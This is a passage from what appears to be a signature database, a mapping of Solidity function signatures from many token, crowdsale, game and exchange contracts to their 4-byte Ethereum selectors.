"0xb37c191b", "remove_helper(uint256)": "0x2902df61", "remove_branch(uint256,uint256,uint256)": "0x9762737a", "zero_out(uint256)": "0xe4e299f7", "rightmost_leaf(uint256)": "0x564f8d23", "insert_helper(uint256,bool,uint256)": "0x1c800d64", "fix_parents(uint256,bool)": "0xd28c2aaa", "rebalance_delete(uint256,bool)": "0x89604ed0", "rebalance_insert(uint256)": "0x78c83f71", "rotate(uint256,bool)": "0x0aed8e72", "balance_factor(uint256)": "0x29d56381", "update_height(uint256)": "0x02965297", "update_counts(uint256)": "0xed3e3e0b", "update_count(uint256)": "0x210970c5", "OrderStatisticTree()": "0x9d4022c8", "compress(bytes)": "0x7e2224bd", "decompress(bytes)": "0x5cd3f3a1", "decode()": "0xc0f8940c", "square(uint256)": "0x7b292909", "MathUtil()": "0xf2761444", "a(bool,bool,bool)": "0x69086c21", "sendSupportETH(address,uint256)": "0x6fe1dbec", "setUFee(uint256)": "0x65c95a6b", "setPayBackRate(uint256)": "0x339e2604", "setMinCustomerBalanceETH(uint256)": "0x99bac5c9", "Time_call()": "0x03261030", "UCAL(uint256,string,uint8,string)": "0x9b2b89d4", "Bacini(uint256,string,uint8,string)": "0x4023da38", "RaffleLedger(string,uint256)": "0x64e31d74", "optIn()": "0x5b48684e", "optOut()": "0xd4eec5a6", "commitUpgrade()": "0x0ba12c83", "purgeUpgrade()": "0x4dfe950d", "getPendingVersionTimestamp()": "0x4bfaf2e8", "getPendingVersion()": "0xa883fb90", "getVersionFor(address)": "0xfe8beb71", "_getAsset()": "0xf19ee2a9", "_setDownRequest(address,uint256,uint256,uint256)": "0xa68d9a62", "_setAuthorizedPower(uint256)": "0xc5b53a34", "_setOutstandingPower(uint256)": "0x08d299ba", "_setPowerBalanceOf(address,uint256)": "0x95c3fc9b", "_setPowerPool(uint256)": "0x1a790a2c", "_setBurnPool(uint256)": "0xfff43b4e", "_setActiveSupply(uint256)": "0xcb5e891f", "_setBabzBalanceOf(address,uint256)": "0x8dcd992e", "StorageEnabled(address)": "0x08f48256", "marbleBalance(address)": "0x0b261340", "removeParent(address)": "0xe922ee6f", "addParent(address)": "0xacf36e53", "useNeonMarbles(address)": "0x84539789", "canUseResource(address)": "0xb34debac", "awardMarble(uint256,address)": "0x53055262", "currentDay()": "0x5c9302c9", "cumReqMarbles()": "0x0aa2b673", "FamilyResourceControl(uint256,uint256,uint256,uint256,uint256[])": "0x8e93907b", "testRIPEMD160()": "0x50a8246f", "testSHA256()": "0x70239222", "testSHA3()": "0xe0e1a7f0", "pushWork(uint256)": "0xde002aa6", "commitWork(uint256)": "0x1c8e9a6f", "deleteWork(uint256)": "0x8589c725", "getWorkCount()": "0x9b97cee5", "getTaskId(uint256)": "0xd44bc088", "newWork(uint256,uint256,uint256,address)": "0xeda5ffdc", "Work()": "0x1a83690d", "newExpertise(uint256,uint256)": "0x51cb9712", "newTask(string,string,uint256,uint256)": "0x2f977b3f", "getExpertiseId(uint256)": "0xcd887739", "Task(address)": "0x6f0fdce8", "storedData(address)": "0xa17cc7eb", "register(address,bytes)": "0x24b8fbf6", "updateWEIAmount(uint256)": "0xfd0f5a81", "updateJMAmount(uint256)": "0x0aa34c7c", "updateIssuer(address)": "0x78312435", "issue(address)": "0x71e928af", "JustmakeNewAccountsIssuer()": "0xb761a16b", "Add(uint32)": "0x039c84c1", "Resource(bytes32,bytes32,bytes32,address)": "0x6c789092", "Queue(bytes32,bytes32,bool,bytes32,address)": "0xff1c52d8", "getClientAtIndex(uint256)": "0x0eac6ae7", "getNumberOfClients()": "0xbe47dca1", "popClient()": "0x4cd280bc", "pushClient(address,bytes32)": "0x70b257a4", "QueueManager()": "0x00f666d4", "getQueuesLength()": "0x563b54b9", "createResource(bytes32,bytes32,bytes32)": "0xa33eff5a", "createQueue(bytes32,bytes32,bool,bytes32,bytes32,bool)": "0xee228dec", "startIcoForOptionsHolders()": "0x04c6a9c5", "startOptionsSelling()": "0x7a888ca9", "initOptionProgram()": "0xf027c7e0", "ICO(address,address,address,address)": "0x5d9169f0", "GVToken(address,address)": "0x4700fada", "_unsafeCall(address,uint256)": "0x406f390c", "_unsafeTransfer(address,uint256)": "0xb376feba", "multiCall(address[],address,uint256[])": "0xb6bb3ade", "multiCallTightlyPacked(bytes32[],address)": "0x441a174c", "multiTransfer(address[],address,uint256[])": "0x1f16fda4", "multiTransferTightlyPacked(bytes32[],address)": "0xa58ba458", "Trident()": "0x352ffb9a", "lockAccount(address,bool)": "0xa03d0f06", "releaseLockedBalance(address,uint256)": "0x1869a084", "mintWithLocked(address,uint256,uint256)": "0xfd241e2b", "VKTToken(uint256,address)": "0x12045d3f", "purchasingAllowed()": "0xda040c0f", "poke(uint128,uint32)": "0x50ed2a2c", "BigBoobsToken()": "0xd3eb667e", "InfinityDataChain()": "0xaf5c1020", "setWhiteListERC223(address)": "0x1bc3c855", "setBlackListERC223(address)": "0x0709d116", "setWhiteListERC20(address)": "0x05298d37", "setBlackListERC20(address)": "0xb6bf3bb3", "LegionToken(uint256,string,string)": "0x2460053e", "SEGFAULTCOIN()": "0x155bdaa0", "buyICO()": "0xc59b5562", "changeExecutor(address)": "0x9665b658", "changePurchaseCap(uint256)": "0x43062ea7", "changeICOStartTime(uint256)": "0x89826963", "changeICOStartBlock(uint256)": "0xe52c0f24", "changeCrowdSale(address)": "0x68d324e7", "ICOBuyer(address,address,uint256,uint256,uint256)": "0x2b76823c", "mAlek()": "0xb5b879c2", "MKYCToken()": "0xda850601", "verifyYourBalance(address)": "0x72ebe2aa", "mop()": "0x4196fad9", "accruedBonus(uint256,uint256)": "0x9f674147", "icoFunded()": "0xc28f8e09", "timeElapsed()": "0xdc2cf3f5", "LitmusCrowdsale()": "0xef80f1ab", "VistaToken()": "0x6c3a208d", "findAllCliWithPendingTask()": "0x78591e1d", "DAPPStoreToken()": "0xef1ad460", "sendMoney()": "0xcbedbf5a", "setRentPrice(uint256,uint256)": "0x99fbf3a2", "rentHo(uint256)": "0x8451738d", "buyHo(uint256)": "0x3862822d", "Brothel(address)": "0x65909081", "getInfo(address,address)": "0xc686554e", "backETH(uint256)": "0x38eff6c6", "drawETH(uint256)": "0x9d98cd78", "PublickOffering()": "0x93253a9d", "setAllowDrawETH(bool)": "0x0a6f2fbb", "Authority()": "0x79bcabf4", "MLC()": "0x553cd9c6", "handlePresaleTokenMany(address[],uint256[])": "0xe701a6d3", "handlePresaleToken(address,uint256)": "0xc8a90f76", "rewardAirdropMany(address[],uint256[])": "0x129f80fb", "rewardBountyMany(address[],uint256[])": "0x743521c6", "rewardBounty(address,uint256)": "0xa0437f63", "rewardAirdrop(address,uint256)": "0x3c7b3d90", "totalPreSaleTokenIssued()": "0xb1e834b0", "totalMainSaleTokenLimit()": "0x07bee472", "totalMainSaleTokenIssued()": "0xeb8eea15", "lockRewardTokenMany(address[])": "0xe1a2c446", "lockRewardToken(address)": "0x52666403", "unlockRewardTokenMany(address[])": "0xd1206a29", "unlockRewardToken(address)": "0xaabe7dc4", "lockMainSaleToken()": "0xa78085ef", "unlockMainSaleToken()": "0x6bc6147e", "ShareToken()": "0xdf1dbbc9", "setMany(address[])": "0xd86123e1", "set(address)": "0x2801617e", "unsetMany(address[])": "0x14b77798", "unset(address)": "0x2966d1b9", "startICO(uint256,address)": "0x4f242cde", "setTokenPriceInCent(uint256)": "0x4df3ad68", "setEthUsdRateInCent(uint256)": "0x92d267c1", "withdrawToOwner()": "0x3cb40e16", "Readcoin()": "0x980d75ab", "BTC7200on420()": "0x94d96fa1", "isPrivateSale()": "0x14be7793", "payFiat(address,uint256,uint256)": "0x085ca94e", "setServiceAgent(address)": "0x04f0aa4e", "payoutTokens(address,uint256,uint256)": "0xcc5a7804", "processPublicPurchase(uint256,address)": "0x147035ba", "processPrivatePurchase(uint256,address)": "0x43e4cef1", "payETH(address)": "0xf8e6a8cf", "LuckchemyCrowdsale(address)": "0xf0ff4840", "startEvaluating()": "0xa8f436df", "HumanEvent(address,uint256,address,address)": "0x61b1bd04", "donate(address,uint256)": "0xe69d849d", "setVoteCost(uint256)": "0x308879bf", "addEvent(address)": "0xc7ae7451", "HumanToken(address,address)": "0x29713781", "transferAnyTokens(address,uint256)": "0xf5d73261", "startSecondStage()": "0x884879d6", "startFirstStage()": "0x7d9f8cf2", "buyForInvestor(address,uint256,string)": "0x0052992e", "contributorsOfCauldronRound(uint8,uint32)": "0x88c463af", "contributionInCauldron(uint8,address)": "0xeb8fa486", "contributorsOfCauldron(uint8)": "0x87f3e5d6", "pickWinners(uint8,address,address,address,uint8,uint8,uint8)": "0x5d62917b", "calculateReward(uint256,uint256,uint8)": "0x76a25c5c", "_rotateCauldron(uint8)": "0xd1fd3b12", "acceptEther(uint8)": "0x9a7614ee", "_acceptContribution(address,uint256,uint8)": "0xdd13fd5f", "setStarAuction(uint8,address,address)": "0x9f16b7d0", "setEnabled(bool)": "0x328d8f72", "horseMaster()": "0x673df0e0", "isCauldronExpired(uint8)": "0x969464f6", "CauldronsMinigamePresale(uint32,address)": "0x1af11767", "_rewardTokens(address,uint256)": "0xe1c621c0", "_processCredit(address,uint256)": "0x2e7f5107", "_processDividends(uint256)": "0xd9089b11", "Floor(uint32,address)": "0xc718b272", "transferWithParams(address,uint256,uint256,uint256,uint256)": "0x411cc791", "_invokeTokenRecipient(address,address,uint256,uint256,uint256,uint256)": "0x94044c75", "setIsMinter(address,address,bool)": "0x8efa3e21", "setCanAcceptTokens(address,address,bool)": "0xeb50849e", "payoutDividends(address,uint256)": "0x73eec3c5", "rewardTokens(address,uint256)": "0x81a4af15", "rewardTokensFloor(address,uint256,uint32)": "0x3e2e806d", "acceptDividends(uint256,uint32)": "0x3719427e", "_acceptDividends(uint256)": "0xb4da662c", "authorizeFloor(uint32,address)": "0x182575f1", "setHeroContract(address)": "0xd2ac0f59", "ETToken()": "0xe94559b1", "acceptTokens(address,uint256,uint256,uint256,uint256)": "0x9c908f61", "AcceptsTokens(address)": "0x03ce9c00", "_postTransferHook(address,address,uint256)": "0x1ebb24bc", "Community()": "0x93dd9443", "DragonCoin()": "0x3227bd8b", "VKBToken()": "0xe823da03", "EARTHToken()": "0x22b0e99a", "BlitzCrypto()": "0xe99d7333", "GoldBlockTickets()": "0x32617353", "ETHDividends()": "0xf5251269", "stopTrade()": "0x8baeefce", "setCouldTrade(uint256)": "0x7ec9290b", "AngelToken()": "0xc791bd21", "BerithCoin(uint256)": "0xbafe648d", "repossess()": "0x79cc90c4", "payLoan()": "0x472eb03d", "lendEther()": "0x76e40c9c", "BITStationERC20()": "0x99a9a04c", "batchMint(address[],uint256[])": "0x68573107", "Play()": "0x0e2dce69", "DHANACOIN()": "0xe2693180", "getCurrentBonusRate()": "0xc0adc465", "getNoOfTokens(uint256,uint256)": "0x5a76e73e", "endCrowdfund()": "0x28b2105c", "startCrowdfund(uint256)": "0x4abad407", "getPreSaleBonusRate(uint256)": "0xb1b7c88f", "getTokensForPreSale(uint256,uint256)": "0xa46efdb5", "buyPreSaleTokens(address)": "0x3fc22c51", "currentBonus(uint256)": "0x92670dc8", "calculateTotalTokenPerContribution(uint256)": "0x76c3b445", "getPreAuthorizedAmount(address,address)": "0xfef2cc97", "fundTransfer(uint256)": "0xeaf8294b", "changeCrowdfundState()": "0x8a6083d2", "setRemainingTokenHolder(address)": "0x3af74940", "setAuthorizerAddress(address)": "0xc69fa8a9", "setFounderMultiSigAddress(address)": "0x1d3f6f1b", "BiQCrowdFund(address,address,address)": "0x5c042d0f", "getVestedAdvisorTokens()": "0x24aa93b9", "getVestedFounderTokens()": "0x4f2578ba", "transferMarketIncentivesFund(address,uint256)": "0x010cc97c", "changeFounderMultiSigAddress(address)": "0x62c5c254", "BiQToken(address,address,address,address)": "0x33f1da25", "recoverAddr(bytes32,bytes)": "0xeaf5815a", "reissueCertWithID(bytes32,bytes,bytes32,uint256,bytes32,bytes,bytes32,uint256,bytes32)": "0xc1a82cdb", "reissueCert(bytes32,bytes,bytes32,uint256,bytes32,bytes,uint256)": "0x419259ef", "revokeCert(bytes32,bytes,bytes32,bool,uint256)": "0x95fe4608", "checkVerifyAccess()": "0x14d36f53", "verifyCertWithID(bytes32,bytes32,bytes32,address)": "0xc03d1b1d", "verifyCert(bytes32,bytes32,address)": "0x67f6a258", "internalVerifyCert(bytes32,bytes32,address)": "0x576d1ce1", "registerCertWithID(bytes32,bytes,bytes32,uint256,bytes32)": "0xeb343301", "registerCert(bytes32,bytes,uint256)": "0xbee588e9", "internalRevokeCert(bytes32,bytes,bytes32,bool,uint256)": "0xfda86c95", "internalRegisterCertWithID(bytes32,bytes,bytes32,uint256,bytes32)": "0x64d79f20", "internalRegisterCert(bytes32,bytes,uint256)": "0xadb2e02f", "checkAccess(address,bytes1)": "0x78d45eb6", "userRight(address,bytes1,uint256)": "0x9dab3cd4", "ISmartCert()": "0x2af8fd94", "getAllowedAmount(address)": "0xaa18f76a", "SEK_Omnidollar()": "0x417c8d40", "IOweYou()": "0x93bd27de", "_percent(uint256,uint256,uint256)": "0xf281c386", "updateWeiPerWholeToken(uint256)": "0xc97ca645", "_byrne(uint256)": "0xf2e84f24", "exchangeTokens(uint256)": "0x40477126", "DAO(address,uint256)": "0x31ca0bae", "SkyeCryptoPrivate(uint256,string,string)": "0x72af7b43", "withdrawDeadFund(address)": "0x1a2a4ab5", "_getWinnerBetted(uint32,uint32)": "0x524e65b9", "backToAll(uint32)": "0x648c925e", "_bonusToBettor(uint32,uint8,uint256)": "0xa4893536", "getMyLandMultiplier()": "0x463c3347", "getGrapesSinceLastHarvest(address)": "0xc12c202c", "getWineProductionRate()": "0x98e3d1d3", "getMyWine()": "0xb085a5af", "getMyGrapes()": "0x049948b0", "getMyVines()": "0xc453cdd4", "setLandProductionMultiplierCCUser(bytes32,address)": "0x8700522a", "setLandProductionMultiplier(address)": "0x2009a059", "createPlotVineyard(address)": "0x7b821410", "addFreeVineyard(address)": "0xdd7db870", "getFreeVines()": "0xeeca6df7", "calculateGrapeBuySimple(uint256)": "0x868a8813", "calculateGrapeBuy(uint256,uint256)": "0x0c0e5f0d", "calculateGrapeSell(uint256)": "0x3632803f", "buyGrapes()": "0x8ba8ffc6", "sellGrapes()": "0xeab9eb2d", "buildWinery()": "0x3fdb372a", "produceWine()": "0x6e4df96e", "harvest(address)": "0x0e5c011e", "transferWalletOwnership(address)": "0xbf3b1101", "Vineyard(address)": "0xb38928c5", "LydianCoin()": "0xc0e8ad51", "_getNextPrice(uint256)": "0x0950e4ad", "_getChainLength(uint256)": "0xf6c0d6a3", "_takeOwnership(uint256,address)": "0x94b367a3", "_checkThenTransfer(address,address,uint256)": "0xb31394cb", "getChain(uint256)": "0xb6791ad4", "getMetadataOf(uint256)": "0x18384df2", "getParentOf(uint256)": "0x13e75206", "getPriceOf(uint256)": "0xb54b4fb9", "getChainFeeArray()": "0xce2c6ad5", "getChainFees(uint256)": "0x9d77e4f8", "setChainFees(uint256[10])": "0x2ce0ca6b", "setOwnerFee(uint256)": "0xfbf0ade1", "setDevFee(uint256)": "0x1c75b6b2", "setMetadata(uint256,bytes32)": "0x3151609e", "setName(uint256,bytes32)": "0xa12396aa", "setParent(uint256,uint256)": "0x223e97be", "setPrice(uint256,uint256,address)": "0xf83fcdea", "setGame(address)": "0x819912a2", "setLayerParent(address)": "0x718eaa50", "blocked(uint256)": "0xd5182b70", "incrementPrice(uint256,address)": "0xb7d9549c", "createTokens(uint256[],address[],bytes32[],uint256[],uint256[],bytes32[])": "0x897a7dab", "createToken(uint256,address,bytes32,uint256,uint256,bytes32)": "0x0c990004", "transferFrom(address,uint256)": "0x01c6adc3", "takeOwnership(uint256,address)": "0xff5f8b4b", "bundleToken(uint256)": "0x645cd046", "approve(address,uint256,address)": "0x1271f09a", "TokenLayer(address,address)": "0xa8a9aaa9", "withdrawFunds(address,uint256)": "0xc1075329", "setContractLock(bool)": "0x53ebf6bd", "transferManager(address)": "0xba0e930a", "transferRemaining()": "0x51fab7ff", "transferToProjectWallet()": "0x136c545c", "Presale()": "0x5036d610", "CERTIToken()": "0x9d69d5c6", "calculateEstimateToken(uint256)": "0x87d76f09", "getCurrentBonus()": "0x57e5eea5", "calculateTokenAmount(uint256,uint256,uint256)": "0xa7c4abdb", "getBonusPercent(uint256)": "0x7c098bc3", "getVolumeBonus(uint256)": "0x712f22a0", "fillPhase(uint8,uint256,uint256)": "0x2cd8c9ae", "RDOCrowdsale(address,address)": "0x54e8561b", "getCrowdsaleAddress()": "0x0a732dac", "stopCrowdfunding()": "0x4b77b8d3", "allocate(address,address,uint256)": "0x2de02bfa", "RDOToken()": "0xca6f8295", "power(uint256,uint256)": "0xc04f01fc", "KOSHER()": "0xbfbc37f7", "AlgeriaToken()": "0x520929b6", "ARXToken()": "0xa8766017", "ECAP()": "0x5c2e891c", "getChancePowerWithBonus(address)": "0x85378346", "fight(address,string)": "0xaad13b15", "getQueueLenght()": "0xaf944fc7", "getGladiatorPower(address)": "0x14db8c7d", "setCooldown(address,uint256)": "0x9781a37e", "removeOrc(address)": "0x1698c7ff", "joinArena()": "0x9bf08a06", "setPartner(address)": "0xa16d5960", "Gladiethers()": "0x0f4df754", "ChangeAddressTrust(address,address,bool)": "0x8c497285", "previligedUnLock(address,uint256)": "0xa1afaa19", "previligedLock(address,uint256)": "0xfd41477f", "MitToken()": "0xfa140e3d", "previligedSubApproval(address,address,uint256)": "0x175892b4", "previligedAddApproval(address,address,uint256)": "0x1d570166", "getPreviligedallowed(address,address)": "0x46a06ddb", "previligedApprove(address,address,uint256)": "0xaeb26733", "previligedBalanceOf(address)": "0x344e23cf", "assert_ex(bool)": "0xf8d609b2", "JACToken()": "0x15af64e7", "ParameterizedToken(string,string,uint256,uint256)": "0x129893dc", "deleteMinter(address)": "0xd82f94a3", "unenableTransfers()": "0xf98456d2", "initializeSomeAddress(address,address,address)": "0xebe29383", "balanceOf()": "0x722713f7", "delBlacklist(address)": "0x3d0ed048", "addBlacklist(address)": "0x9cfe42da", "setDepositGasCost(uint8)": "0xd0dd38ad", "setCasinoAddress(address)": "0xff55e2ee", "BankrollLending(address,address)": "0x27a49cbe", "setDistributor(address)": "0x75619ab5", "__DEBUG_BAL()": "0xe76e5ecf", "__redeem()": "0xd41c85fa", "purchaseToken()": "0xa95c4d62", "purchaseProduct(bytes32,uint256)": "0x788e72a5", "checkProduct(bytes32)": "0x2987c8f7", "inventoryProduct(bytes32)": "0x34dc2176", "modifyProductPrice(bytes32,uint256,uint256)": "0x59478411", "modifyProductLimit(bytes32,uint256)": "0x3a45af86", "modifyProductPrice(bytes32,uint256)": "0x75052882", "nullifyProduct(bytes32)": "0xf7dba1dc", "createProduct(bytes32,uint128,uint256)": "0x472aa7df", "__getEthPrice(uint256)": "0x3cece78b", "seeEthPrice()": "0x0d7548f7", "setEthPrice(uint128)": "0xd24b7e7a", "setTokenPrice(uint128)": "0x611f64f9", "TestConf()": "0x9451f865", "crowdsaleEther()": "0x151c0d40", "setTokenContract(address)": "0xbbcd5bbe", "setFinalICOPeriod()": "0x8d9e6e47", "buyMCT(address,uint256)": "0x4c8f4810", "buyMCTTokenProxy(address,uint256,uint256)": "0x0fb2e692", "priceAt(uint256)": "0x9dab2054", "MCTCrowdsale(uint256,uint256,uint256)": "0x237c2b22", "mintUnICOLeftToken(address,address,address)": "0xebf5128c", "freezeAccounts(address,bool)": "0x17634ec8", "freezeTransfersUntil(uint256,string)": "0xaa19ed77", "burnLeftTokens()": "0x2d962d0f", "mctTotalSupply()": "0x0104855f", "MCTContractToken(uint256,address)": "0xcb00e7f8", "Bitdore(uint256,string,string)": "0xa6060fcb", "UnicornCoin()": "0x9089e0c2", "WorthlessToken()": "0x343efc6c", "setCooldown(uint16,uint32)": "0xc14e7a3f", "changeGeneration(uint40,uint16)": "0x5a3f88f0", "changeOptional(uint40,uint64)": "0x6c295936", "changeCooldownIndex(uint40,uint16)": "0xcf7e69f8", "changeCooldownEndTime(uint40,uint40)": "0xc4791421", "changeGenes(uint40,uint256)": "0xe1af915d", "getOptional(uint40)": "0x3e6d4e12", "getGeneration(uint40)": "0x9c91ae20", "getCooldownIndex(uint40)": "0x2917f162", "getCooldownEndTime(uint40)": "0xf6dfcff7", "getGenes(uint40)": "0x999d3947", "getCutie(uint40)": "0xe39bdfab", "isCutieCore()": "0x4d6a813a", "getBreedingFee(uint40,uint40)": "0x66dc860a", "getTutorialBabyGen(uint16)": "0x656e8d6f", "getBabyGen(uint16,uint16)": "0x1af97fb7", "getCooldownIndexCount()": "0x732606fc", "getCooldownEndTimeFromIndex(uint16)": "0x06347def", "getCooldownIndexFromGeneration(uint16)": "0x5757dcdf", "isConfig()": "0xdcb31b82", "Rasper()": "0x1c5ef50b", "BBB()": "0x06b89153", "KindAdsToken()": "0x6ce37387", "safeApprove(address,uint256,uint256)": "0xf6503662", "CRFtoken()": "0x268da061", "finalizeCrowdsale(address)": "0x4cb6d6af", "getWalletsCount()": "0x778b5aee", "delWallet(uint256)": "0x605cee71", "delPhase(uint256)": "0x776d89ba", "setPhase(uint256,uint256,uint256,uint256)": "0xd699fe3d", "setTotalPhases(uint256)": "0xaa430e64", "addWallet(address,address)": "0xfff7a97e", "calculateUSDcValue(uint256)": "0x688bf035", "delCashier(address,address)": "0xe13bd03c", "addCashier(address,address)": "0x8dbd7d54", "delBot(address,address)": "0x09412b53", "addBot(address,address)": "0x65d0e4a7", "isInPhase(uint256)": "0x372ff945", "offChainPurchase(address,uint256,uint256)": "0x63dcf376", "LongevityCrowdsale(address,uint256)": "0xb558a50c", "setCap()": "0xc4c49380", "setMintTap(uint256,int256)": "0x9a4bca21", "getTapRemaining()": "0xa07c4fcf", "passThroughTap(uint256)": "0xae181f84", "delMinter(address,address)": "0x8c4a6f62", "addMinter(address,address)": "0xfa188df2", "delOwner(address,address)": "0x329ce1b7", "addOwner(address,address)": "0x16d390bf", "LongevityToken()": "0x6ce912ab", "WerderCoin(uint256,string,uint8,string)": "0x22156bb2", "closeCrowdsale()": "0x983c0a01", "nextStep(uint256)": "0x89850fae", "setTokenRate(uint256)": "0x61241c28", "transferOwner(address,address,uint256)": "0x161b5e46", "_transfer(address,uint256,bytes)": "0x8cc8c236", "removeWhiteLister(address,address)": "0xd5472fcb", "addWhiteLister(address,address)": "0x21dc74fa", "Whitelist(address,uint256)": "0x447615df", "TadamWhitelistPublicSale()": "0x29435cde", "BunnyCoin()": "0x4384d53a", "ABYSS()": "0xa59def62", "ericukis(uint256,string,uint8,string)": "0x8597eb6e", "TCOCOIN()": "0x833472ba", "Invacio()": "0xc6b20dc2", "initialBuyCard(uint8,string,string,string)": "0x7b65d0ec", "getCard(uint8)": "0x09004eb1", "getCardDetails(uint8)": "0xb7b2a009", "getCardsDetails()": "0xd5bd57a1", "getCards()": "0xb0df9e53", "Dappster()": "0x10cc6e21", "WrapReadTokenData()": "0xf698e626", "Mitrav()": "0xe05cb6f4", "uploadData(bytes32[100])": "0xd578ec6c", "BitliquorStandardToken(uint256,string,uint8,string)": "0x89c7e70c", "grantInitialAuthentication(address)": "0xef7f3834", "EndEvent()": "0x13fb2324", "RTC(uint256,string,string)": "0x4366af55", "ThingToken()": "0x93f2fa04", "CBCToken()": "0xbb453d5a", "_createAvatar(string,address,uint256)": "0x4f10a0bd", "getAvatar(uint256)": "0x1328ec9b", "createAvatar(string,uint256)": "0xd1d93318", "Avatarium()": "0x121557a3", "COOPET(uint256,string,uint8,string)": "0x71c80c67", "Kemonocoin()": "0x305a99c1", "DogeCash(uint256,string,string)": "0xcdcda9a8", "callContractFunctionByAddress(address,string,address,address,uint256,uint256,bool,bool,string,string,bytes32,bytes32)": "0xb0cbc8b9", "withdrawFunds(uint256,address)": "0x744bfe61", "ICOState(bool)": "0x27fb1da7", "setVaribles(string,string,uint256)": "0x44c55801", "buyPriceAt()": "0xb2627ec0", "EOBIToken()": "0x5c0fed8e", "JLL()": "0x52d35197", "isAdvisor(address)": "0xc661fed3", "addAdvisor(address)": "0xf46c858a", "FricaCoin()": "0x9033de61", "transferToAdvisors(address,uint256)": "0x1eca98ce", "HiroyukiCoin()": "0xfba906c5", "openGameResultAndNewGame(uint256,string,bytes32)": "0x03bb5d8a", "_openGameResult(uint256,string)": "0x3fc5ed50", "openGameResult(uint256,string)": "0xc2370a62", "uint8ToString(uint256)": "0x8826ce84", "_play(uint256,uint256)": "0x7e8ab941", "SelectOne(uint256,uint256,uint256,uint256,uint256,string,address)": "0xac591e40", "buyTokensWithReferrer(address)": "0x37ee3edb", "getCurrentRateInternal()": "0xc54a068c", "tempGetDataToCheck(uint256,uint256)": "0xb9e7c061", "initialTransferToDevTeam()": "0x8df068ab", "changeRewardMintingAmount(uint256,int256)": "0x50d279bd", "userRewardAccountBalance(address,address)": "0xd5472a5e", "redeemReward(address,uint256)": "0x105ff033", "resetReward()": "0x55c64ce1", "distributeReward(address,uint256,uint256)": "0xde5b71f7", "batchDistributeReward(address[],uint256[],uint256)": "0xe0f9210b", "IiinoCoin(string,string,uint8,uint256,int256,uint256)": "0xa0e1001e", "decreaseApprovalInternal(address,uint256)": "0x47ee0a69", "increaseApprovalInternal(address,uint256)": "0xb6c3e8cc", "approveInternal(address,uint256)": "0x083cadf0", "allowanceInternal(address,address)": "0x7bcc1ff6", "transferInternal(address,uint256)": "0x541f631a", "ContractFeatures()": "0xcd15fc71", "JackToken()": "0x1f572504", "numberOfTokens(uint256,uint256)": "0x443f19f4", "getCurrentExchangeRate()": "0x3ca967f3", "ICOend()": "0x41c5cf5c", "setfounderAddress(address)": "0xa1264994", "TalentICO()": "0x331c4594", "TalentToken(address)": "0x3c6d2610", "RyxEx(address,address,address,uint256,uint256,uint256)": "0x4df34124", "Visus(address)": "0x861004ae", "SudanGoldCoinCrowdsale(uint256,uint256,uint256,address)": "0xdc69aa23", "SudanGoldCoinToken()": "0xf0375c55", "CappedAndBurnableToken(uint256)": "0xd7984cff", "Trade()": "0x4d9fb121", "Dagt()": "0x0b070845", "hkchain(uint256,string,string)": "0xf702dd8a", "LATINOToken()": "0x2758743c", "Restrictable()": "0x45906baf", "transferOwnershipManualMinter(address)": "0x50713dc0", "PowerCoin()": "0x4b4b87c0", "eT(address,uint256,uint256)": "0x07c299c2", "XFC()": "0xa248df4f", "getQuotes()": "0xa4204e39", "getPixels(bytes32)": "0xfb1291c3", "removePixelsFromMarket(bytes32)": "0x1969c21a", "sendPixelsToMarket(bytes32,uint256)": "0xef0143a3", "buyOwnedPixels(bytes32)": "0x40e2ad58", "buyFreePixels(uint256,uint256,uint256,uint256)": "0x2b4158cb", "PixelOperationsContract()": "0x15a686f3", "AntzToken()": "0x8e49ff47", "changeReserveCATDestinationAddress(address)": "0xb0112ef2", "changeDeveloperCATDestinationAddress(address)": "0x3aa718d5", "CATToken(address,address,address,uint256,uint256)": "0x9ad4f658", "bulkTransfer(address[],uint256)": "0x4ca64b3a", "SkillCoinTest()": "0xfa472bad", "PBKtoken()": "0x6b5b6285", "transferOwnership2(address)": "0xe2b375a9", "POFOMO()": "0xdc540979", "BecToken()": "0x2c24ecc7", "CloudX()": "0xee20e493", "MANHATTANPROXY2NDST()": "0xd3deedfd", "create(string,string,uint8,address)": "0x61c6bc82", "ERC223MintableTokenFactory(address)": "0xdafc64c4", "AllocatedCrowdsaleMixin(address)": "0x7230eb42", "Vitamin()": "0xf549dd0e", "Ecopay()": "0x773f4873", "grantToken(address)": "0x79d3d547", "publishMessage(string)": "0xbebfe207", "submitTransaction(address,uint256,bool,bytes)": "0xc6ac53fd", "executeDelegateCall(address,uint256,bytes)": "0x1ef09ccf", "popTransaction()": "0xae0755d3", "imOwner()": "0x8b214d5d", "rmTrusted(address)": "0x44e4c366", "addTrusted(address)": "0xd4d0d6e6", "updateFeeProvider(address)": "0x2bcb849c", "FEE_COLLECTOR()": "0x7f660b01", "feeProvider()": "0x4066fdea", "cancelOrderList(bytes32[],uint64[])": "0xfe86338c", "getSellPosition(bytes32,uint256)": "0xfb9a2ce2", "defaultTransferGas()": "0xfafa4c82", "setAssetTransferGas(address,uint256)": "0xf104c836", "getMarkets()": "0xec2c9016", "submitSellOrder(bytes32,uint256,uint256)": "0xde35be81", "getNextActiveSellDetails(bytes32,uint64)": "0xd6b33f59", "getNextActiveBuyDetails(bytes32,uint64)": "0xd6b224f2", "assets(uint256)": "0xcf35bdd0", "setAccessProvider(address)": "0xc77ef9b8", "getFeeCollected()": "0xbcee2dd4", "assetProperties(address)": "0xbb9453a5", "markets(uint256)": "0xb1283e77", "getFeesByAsset(address)": "0xa9fb8fe6", "getMarketInfo(bytes32)": "0xa270cdf3", "setMarketFees(bytes32,uint16,uint16,uint16,uint16,bool)": "0x9bbeafc1", "getActiveSellDetails(bytes32)": "0x8e6ce1b1", "getActiveBuyDetails(bytes32)": "0x8ca517dd", "submitTotalSellOrder(bytes32,uint256,uint256)": "0x8b06a662", "nonTransferrableBalances(address,address)": "0x8288edd0", "getFeeCollectedByAsset(address)": "0x75790787", "setAssetFeesList(address[],uint256[],uint256[])": "0x5415b8f8", "getActiveSellSize(bytes32)": "0x4af1f96a", "getActiveBuySize(bytes32)": "0x474c0868", "registerMarket(bytes32,address,address)": "0x453e5a2c", "submitBuyOrderWithPosition(bytes32,uint256,uint256,uint64,bool)": "0x269ecf28", "accessProvider()": "0x2451b3d8", "setDefaultTransferGas(uint256)": "0x24503ab0", "getBuyPosition(bytes32,uint256)": "0x1b027b44", "submitTotalBuyOrder(bytes32,uint256,uint256)": "0x180f4c2c", "submitSellOrderWithPosition(bytes32,uint256,uint256,uint64,bool)": "0x1654474b", "getAllMarketsInfo()": "0x139df200", "withdrawFee(address,address,uint256)": "0x1095b6d7", "cancelOrder(bytes32,uint64)": 